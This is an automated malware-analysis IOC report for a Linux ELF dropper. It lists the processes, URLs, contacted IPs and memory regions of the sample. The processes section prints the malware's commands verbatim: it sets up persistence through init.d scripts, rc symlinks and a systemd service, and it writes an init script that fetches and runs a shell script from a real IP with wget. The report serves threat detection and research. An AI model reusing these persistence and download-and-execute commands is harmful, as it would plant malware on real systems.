Automated Malware Analysis IOC Report for

Files

File Path

Type

Processes

Path

Cmdline

Malicious

/tmp/0aEXGHNxhO.elf

/bin/sh

sh -c "systemctl enable custom.service >/dev/null 2>&1"

/bin/sh

/usr/bin/systemctl

systemctl enable custom.service

/tmp/0aEXGHNxhO.elf

/bin/sh

sh -c "chmod +x /etc/init.d/mybinary >/dev/null 2>&1"

/bin/sh

/usr/bin/chmod

chmod +x /etc/init.d/mybinary

/tmp/0aEXGHNxhO.elf

/bin/sh

sh -c "ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary >/dev/null 2>&1"

/bin/sh

/usr/bin/ln

ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary

/tmp/0aEXGHNxhO.elf

/bin/sh

sh -c "echo \"#!/bin/sh\n# /etc/init.d/0aEXGHNxhO.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting 0aEXGHNxhO.elf'\n /tmp/0aEXGHNxhO.elf &\n wget http://154.216.19.140/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping 0aEXGHNxhO.elf'\n killall 0aEXGHNxhO.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/0aEXGHNxhO.elf"

/tmp/0aEXGHNxhO.elf

/bin/sh

sh -c "chmod +x /etc/init.d/0aEXGHNxhO.elf >/dev/null 2>&1"

/bin/sh

/usr/bin/chmod

chmod +x /etc/init.d/0aEXGHNxhO.elf

/tmp/0aEXGHNxhO.elf

/bin/sh

sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"

/bin/sh

/usr/bin/mkdir

mkdir -p /etc/rc.d

/tmp/0aEXGHNxhO.elf

/bin/sh

sh -c "ln -s /etc/init.d/0aEXGHNxhO.elf /etc/rc.d/S990aEXGHNxhO.elf >/dev/null 2>&1"

/bin/sh

/usr/bin/ln

ln -s /etc/init.d/0aEXGHNxhO.elf /etc/rc.d/S990aEXGHNxhO.elf

/tmp/0aEXGHNxhO.elf

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/libexec/gnome-session-binary

/bin/sh

/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping

/usr/libexec/gsd-housekeeping

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/systemd/systemd

/usr/lib/systemd/system-environment-generators/snapd-env-generator

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

There are 38 hidden processes, click here to show them.

URLs

Name

Malicious

http://154.216.19.140/curl.sh

unknown

Details

Name:	http://154.216.19.140/curl.sh
TargetID:	12
From Memory:	true
Current Path:	/tmp/0aEXGHNxhO.elf
Source:	0aEXGHNxhO.elf

Signature Hits	Behavior Group	Mitre Attack
Found strings indicative of a multi-platform dropper	Spreading	Scripting
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable	System Summary
URLs found in memory or binary data	Networking

http://154.216.19.140/lol.sh

unknown

Details

Name:	http://154.216.19.140/lol.sh
TargetID:	12
From Memory:	true
Current Path:	/tmp/0aEXGHNxhO.elf
Source:	0aEXGHNxhO.elf

Signature Hits	Behavior Group	Mitre Attack
Found strings indicative of a multi-platform dropper	Spreading	Scripting
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable	System Summary
URLs found in memory or binary data	Networking

http://154.216.19.140/

unknown

Details

Name:	http://154.216.19.140/
TargetID:	-1
From Memory:	true
Source:	0aEXGHNxhO.elf, profile.12.dr, inittab.12.dr, bootcmd.12.dr, 0aEXGHNxhO.elf.36.dr, mybinary.12.dr, custom.service.12.dr

Signature Hits	Behavior Group	Mitre Attack
Executes commands using a shell command-line interpreter	Persistence and Installation Behavior	Scripting
Found strings indicative of a multi-platform dropper	Spreading	Scripting
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable	System Summary
URLs found in memory or binary data	Networking

IPs

Domain

Country

Malicious

46.228.134.119

unknown

Finland

39.186.177.245

unknown

China

137.106.94.110

unknown

United States

92.249.97.63

unknown

Ukraine

104.2.223.101

unknown

United States

129.250.191.148

unknown

United States

88.153.17.169

unknown

Germany

169.80.33.176

unknown

United States

51.29.18.197

unknown

United States

148.221.166.237

unknown

Mexico

62.172.69.170

unknown

United Kingdom

4.179.252.190

unknown

United States

148.61.66.50

unknown

United States

55.223.114.210

unknown

United States

36.99.206.133

unknown

China

215.70.67.18

unknown

United States

105.33.55.237

unknown

Egypt

29.173.23.249

unknown

United States

102.97.225.96

unknown

Morocco

205.100.99.246

unknown

United States

217.235.129.148

unknown

Germany

87.55.140.142

unknown

Denmark

88.23.166.249

unknown

Spain

123.8.73.61

unknown

China

165.7.204.182

unknown

United States

139.113.133.233

unknown

Norway

25.233.114.19

unknown

United Kingdom

40.74.153.223

unknown

United States

109.62.187.3

unknown

Russian Federation

43.61.235.2

unknown

Japan

146.26.241.101

unknown

United States

171.40.4.12

unknown

China

193.115.94.173

unknown

Australia

221.66.3.53

unknown

Japan

211.94.112.232

unknown

China

221.158.135.212

unknown

Korea Republic of

36.35.209.45

unknown

China

1.248.188.192

unknown

Korea Republic of

35.159.158.194

unknown

United States

205.28.112.89

unknown

United States

3.104.88.38

unknown

United States

119.253.183.134

unknown

China

83.86.78.189

unknown

Netherlands

116.124.181.132

unknown

Korea Republic of

129.247.101.108

unknown

Germany

176.209.173.125

unknown

Russian Federation

40.245.204.14

unknown

United States

166.38.43.172

unknown

United States

114.219.151.42

unknown

China

23.144.30.165

unknown

Reserved

110.248.37.176

unknown

China

28.45.61.48

unknown

United States

6.75.205.208

unknown

United States

135.64.195.28

unknown

United States

156.20.210.50

unknown

United States

90.72.144.145

unknown

France

186.55.147.79

unknown

Uruguay

49.152.43.158

unknown

China

31.121.117.149

unknown

United Kingdom

97.128.161.130

unknown

United States

91.242.3.73

unknown

Azerbaijan

56.58.158.205

unknown

United States

174.135.162.34

unknown

United States

15.13.173.173

unknown

United States

160.103.152.84

unknown

France

126.72.122.39

unknown

Japan

176.115.4.183

unknown

Poland

97.74.224.65

unknown

United States

101.35.170.42

unknown

China

99.158.155.221

unknown

United States

2.3.9.131

unknown

France

54.179.225.216

unknown

United States

69.209.238.217

unknown

United States

179.71.111.112

unknown

Brazil

45.11.199.218

unknown

Russian Federation

6.46.18.47

unknown

United States

181.103.30.179

unknown

Argentina

87.146.148.47

unknown

Germany

105.240.240.100

unknown

South Africa

6.2.93.12

unknown

United States

91.46.185.80

unknown

Germany

9.203.234.215

unknown

United States

164.171.51.138

unknown

United States

88.86.234.206

unknown

France

193.143.1.59

unknown

55.207.150.249

unknown

United States

92.175.173.96

unknown

France

59.31.52.189

unknown

Korea Republic of

150.55.146.45

unknown

Japan

93.185.42.204

unknown

Armenia

164.188.13.89

unknown

United States

16.36.113.77

unknown

United States

191.156.248.123

unknown

Colombia

8.233.158.109

unknown

United States

206.39.78.50

unknown

United States

82.157.85.62

unknown

China

195.237.52.250

unknown

Finland

146.250.31.164

unknown

United States

207.148.75.30

unknown

United States

120.211.29.96

unknown

China

There are 90 hidden IPs, click here to show them.

Memdumps

Base Address

Regiontype

Protect

Malicious

7f29fc420000

page execute read

7f29fc420000

page execute read

7f2a85162000

page read and write

7f2a85343000

page read and write

7fff725de000

page execute read

7f2a84792000

page read and write

56359158b000

page read and write

7f2a84e14000

page read and write

7f2a85343000

page read and write

7f29fc465000

page read and write

7f29fc461000

page read and write

7f2a8546c000

page read and write

7f2a847a0000

page read and write

7fff725de000

page execute read

7f2a854b9000

page read and write

7f2a847a0000

page read and write

7f2a7c000000

page read and write

7f2a85474000

page read and write

7f2a84df1000

page read and write

5635935aa000

page read and write

563591595000

page read and write

7fff7253e000

page read and write

7f2a84e14000

page read and write

563591303000

page execute read

7f2a83f8a000

page read and write

7f2a7c021000

page read and write

563591595000

page read and write

563593593000

page execute and read and write

7f2a84df1000

page read and write

7f29fc46b000

page read and write

7f2a84a50000

page read and write

7f2a85162000

page read and write

7f2a7c021000

page read and write

7f2a84e31000

page read and write

7f2a83f8a000

page read and write

563593593000

page execute and read and write

56359524e000

page read and write

7fff7253e000

page read and write

5635935aa000

page read and write

7f2a84a50000

page read and write

7f29fc461000

page read and write

7f2a85474000

page read and write

7f2a84e31000

page read and write

7f2a7c000000

page read and write

56359158b000

page read and write

563591303000

page execute read

7f2a854b9000

page read and write

56359524e000

page read and write

7f2a84792000

page read and write

7f2a8546c000

page read and write

7f29fc465000

page read and write

There are 41 hidden memdumps, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
0aEXGHNxhO.elf

Files

Processes

URLs

IPs

Memdumps

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report0aEXGHNxhO.elf

Files

Processes

URLs

IPs

Memdumps

IOC Report
0aEXGHNxhO.elf